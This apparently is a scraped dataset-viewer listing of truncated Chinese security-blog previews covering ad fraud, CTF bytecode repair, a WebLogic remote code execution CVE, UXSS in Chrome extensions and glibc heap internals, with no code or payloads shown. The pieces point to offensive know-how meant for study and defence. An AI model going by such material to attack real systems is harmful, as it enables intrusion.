国际执法部门强烈抨击制造虚假广告的团队。
在10月22日(星期一)这一天,一项涉及全球执法机构的黑客行动将目标瞄准了被称为“3ve”的网络广告欺诈团体。在2018年11月27日,此事件中里8名被告的13项起诉书被揭开。
在这八名被告中,有三名参与方被拘留并等待引渡。
多年来,广告欺诈活动一直困扰着互联网的广告生态系统。这些欺诈也使合法公司的收入逐渐减少。而在我们的分析中,这些广告欺诈的过程始终是相似的:尽管所有的诈骗行为都是自动化进行的,然而软件模仿用户,使其看起来好像真正的人点击链接或查看在线广告。
除了上述方法外,这里还存在另外一种广告欺骗策略——Stantinko。它监听了用户的点击次数,并将用户访问的页面重... | 社区文章 |
作者: [Hcamael@知道创宇404实验室](http://0x48.pw)
发布时间:2017-03-20
上周末的0CTF出现了一个pyc的题目,但是Pyopcode损坏,于是手撸了一波
题目: <https://github.com/Hcamael/CTF_repo/tree/master/0CTF%202017/Re3%28py%29>
通过pyc还原出py网上的资料挺多了,py也有专门的库可以还原,但是0CTF这题却无法还原,目测是opcode损坏,同时根据题目描述,也知道是要修复pyc文件。
这里用到两个库,一个`dis`,可以把二进制反编译CPython bytecode。一个是`marshal`,可以把字符串... | 社区文章 |
# Weblogic未授权访问及命令执行分析复现(CVE-2020-14882/14883)
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 一、背景
### 漏洞概述:
WebLogic是美国Oracle公司的主要产品之一,是商业市场上主要的 J2EE 应用服务器软件,也是世界上第一个成功商业化的J2EE应用服务器,在
Java 应用服务器中有非常广泛的部署和应用。10月21日,Oracle官方发布数百个组件的高危漏洞公告。其中组合利用CVE-2020-14882/
CVE-2020-14883可使未经授权的攻击者绕过WebLogic后台登录等限制,最终远程执行代码接管WebLogic服务... | 社区文章 |
本文由红日安全成员: **水清云影** 编写,如有不当,还望斧正。
## 前言
大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫 [**PHP-Audit-Labs**](https://github.com/hongriSec/PHP-Audit-Labs) 。现在大家所看到的系列文章,属于项目
**第一阶段** 的内容,本阶段的内容题目均来自 [PHP SECURITY CALENDAR
2017](https://www.ripstech.com/php-security-calendar-2017/)
。对于每一道题目,我们均给出对应的分析,并结合... | 社区文章 |
# 【知识】11月22日 - 每日安全知识热点
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**热点概要:向黑客势力低头!Uber被曝出破财消灾、安卓手机关闭定位后依然会被谷歌收集定位数据、区块链网站安全又遭挑战,Tether被黑,大量令牌泄露、2017
OWASP Top10正式发布、Gold SAML——新攻击技术、 Atom之从Markdown到RCE、SGX-Bomb:对抗勒索软件、与Lazarus组织有关联的安卓恶意软件出现。**
**资讯类:**
向黑客势力低头!Uber被曝出破财消灾
<https://www.bloomberg.com/news/artic... | 社区文章 |
# 深度残差网络隐写分析模型探究
##### 译文声明
本文是翻译文章,文章原作者 ieee,文章来源:ieeexplore.ieee.org
原文地址:<https://ieeexplore.ieee.org/document/8470101>
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
本文提出了一个深度残差网络隐写分析模型SRNet,它巧妙地将残差网络应用于特征提取的过程中,从而有效防止了梯度消失,并取得了很好的隐写检测效果。
## SRNet
SRNet中R代表“Residual”,它既指隐写分析中的残差特征,也指深度学习中应用快捷连接方式的残差连接层。首先描述SRNet的网络结构,再分别讲解每个组件。
##... | 社区文章 |
## 前言
前些日子Intigriti出了一道关于XSS的题目。目前比赛已经结束了,但是仍可以通过下面地址体验一下:
<https://challenge.intigriti.io>
题目很简单,就是下图中的代码,找到xss漏洞即可获胜
## 分析
分析一下这段代码,为了方便测试,我把这个xss挑战代码放到了我本地 _<http://127.0.0.1/xssctf/index.html>_ 地址
首先在第二行处有个一个白名单,如下图红框处
Whitelist中定义了两个域名,'intigriti.com'与'intigriti.io'。这个白名单在下文代码中会用到
接着通过location.hash.substr(1)取出字符... | 社区文章 |
My Blog: <https://blog.zsxsoft.com/post/42>
最近(被迫)拿到了不少经过混淆的PHP代码样本,尤其是我使用的某个开源软件里面竟然也有被混淆的PHP代码,导致我不得不把它们都解混淆来检查一下。不过,这些只要20分钟就能写出通用解混淆代码的混淆有什么意义呢?
好想出去玩_(:з」∠)_但出不去,只好在家里应XCTF抗疫赛邀请出题了。但是实在没题出怎么办?恰巧看到Xray的一篇吐槽安全从业人员代码平均开发能力差的文章,考虑到解混淆需要一定的开发能力,不如来用混淆水一题吧……
顺带一提,本次比赛中,我观赏了一下各个队伍的去混淆脚本,基本上都是正则表达式+黑魔法的写法,根本看不懂……
## How?
... | 社区文章 |
# Chrome 扩展安全研究: 一个UXSS的挖掘经历
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> 本篇原创文章参加双倍稿费活动,预估稿费为600元,活动链接请点[此处](https://www.anquanke.com/post/id/98410)
## 引言
有点想把标题换成 <Chrome 安全研究: 一个UXSS的挖掘经历> 来骗一波点击。但毕竟其实是扩展的问题,还是老实点写“扩展”吧。
这是我春节前挖到的一个漏洞,大概抓取了用户量top400的 Chrome
扩展,对比较在意的几个问题写了脚本删选了一部分出来,再逐个审计。本次讲的这个漏洞是想产出 UXSS 的时候挖的 UXS... | 社区文章 |
# Glibc-2.23 源码分析——malloc部分上
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
终于抽出时间对glibc动态内存管理部分源码进行初略的探究,试着从源码和动调来分析free函数执行过程和一些pwn的攻击技巧,分析的不是很全面,有错误的地方望提出指正,共同进步。ps:欢迎白帽子们关注
涂鸦智能安全响应中心
* * *
## 相关结构体
### Chunk的结构体 malloc_chunk
对于inuse的chunk 只有malloc_chunk.size是生效的,fd,bk指针对于free
chunk生效,fd_nextsize,bk_nextsize对于l... | 社区文章 |
Subsets and Splits
Top 100 EPUB Books
This query retrieves a limited set of raw data entries that belong to the 'epub_books' category, offering only basic filtering without deeper insights.